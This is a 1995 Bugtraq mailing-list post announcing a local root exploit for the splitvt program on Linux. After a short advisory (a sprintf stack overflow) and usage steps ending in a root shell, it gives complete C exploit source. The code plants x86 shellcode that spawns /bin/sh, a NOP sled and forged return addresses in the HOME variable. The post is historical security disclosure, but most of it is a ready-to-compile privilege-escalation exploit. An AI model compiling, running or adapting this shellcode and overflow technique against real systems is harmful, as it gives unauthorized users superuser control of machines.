-- BEGIN included message.
-- END included message
- To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
- Subject: Avalon Release
- From: root <root@crimson.cadvision.com.crimelab.com>
- Date: Sun, 3 Dec 1995 22:52:37 -0700
- Approved-By: CHASIN@CRIMELAB.COM
- Approved-By: root <root@CRIMSON.CADVISION.COM.CRIMELAB.COM>
- In-Reply-To: <199512040028.TAA06752@tarsier.cv.nrao.edu>
- Reply-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
- Sender: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
Avalon Security Research Release 1.3 (splitvt) Affected Program: splitvt(1) Affected Operating Systems: Linux 2-3.X Exploitation Result: Local users can obtain superuser privelages. Bug Synopsis: A stack overflow exists via user defined unbounds checked user supplied data sent to a sprintf(). Syntax: crimson~$ cc -o sp sp.c crimson~$ sp bash$ sp bash$ splitvt bash# whoami root Credit: Full credit for this bug (both the research and the code) goes to Dave G. & Vic M. Any questions should be directed to mcpheea@cadvision.com .
long get_esp(void) { __asm__("movl %esp,%eax\n"); } main() { char eggplant[2048]; int a; char *egg; long *egg2; char realegg[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; char *eggie = realegg; egg = eggplant; *(egg++) = 'H'; *(egg++) = 'O'; *(egg++) = 'M'; *(egg++) = 'E'; *(egg++) = '='; egg2 = (long *)egg; for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30; egg=(char *)egg2; for (a=0;a<0x40;a++) *(egg++) = 0x90; while (*eggie) *(egg++) = *(eggie++); *egg = 0; /* terminate eggplant! */ putenv(eggplant); system("/bin/bash"); }